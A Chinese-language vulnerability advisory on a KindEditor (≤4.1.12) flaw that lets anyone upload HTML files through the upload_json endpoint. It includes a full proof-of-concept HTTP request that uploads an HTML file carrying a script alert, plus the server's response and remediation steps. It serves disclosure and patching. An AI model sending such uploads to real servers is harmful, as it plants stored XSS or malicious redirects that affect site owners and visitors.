KindEditor 文件上传漏洞
漏洞描述
漏洞存在于KindEditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中。
这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm,txt:extTable.Add(“file”,“doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2”)
由于KindEditor中upload_json.*上传功能文件允许被直接调用从而实现上传htm,html到文件到服务器,用户可以通过上传存在包含跳转到违规站点的代码从而实现的恶意攻击。
影响范围
Kindeditor版本<4.1.12
漏洞验证
漏洞存在于<=Kindeditor4.1.12编辑器中,所以先查看编辑器版本
1.查看版本信息
2.漏洞验证
Request数据包
POST /kindeditor/asp/upload_json.asp?dir=file HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------283422705626536477632563104216 Content-Length: 260 Connection: close Cookie: ASPSESSIONIDQACQQBTT=XXXXXXXXXXXX Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache -----------------------------283422705626536477632563104216 Content-Disposition: form-data; name="imgFile"; filename="1.html" Content-Type: application/octet-stream <script>alert('1')</script> -----------------------------283422705626536477632563104216--
Response数据包
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Server: Microsoft-IIS/10.0 Set-Cookie: ASPSESSIONIDSQBRRCAB=BNLFKMXXXXXXXXM; path=/ X-Powered-By: ASP.NET Date: Thu, 09 Sep 2021 07:33:15 GMT Connection: close Content-Length: 94 {"error":0,"url":"\/kindeditor\/asp\/..\/attached\/file\/20210909\/20210909153396539653.html"}
漏洞修复
1.直接删除upload_json.和file_manager_json.
2.升级kindeditor到最新版本
参考链接
https://www.anquanke.com/post/id/171422 https://www.cnblogs.com/backlion/p/10421405.html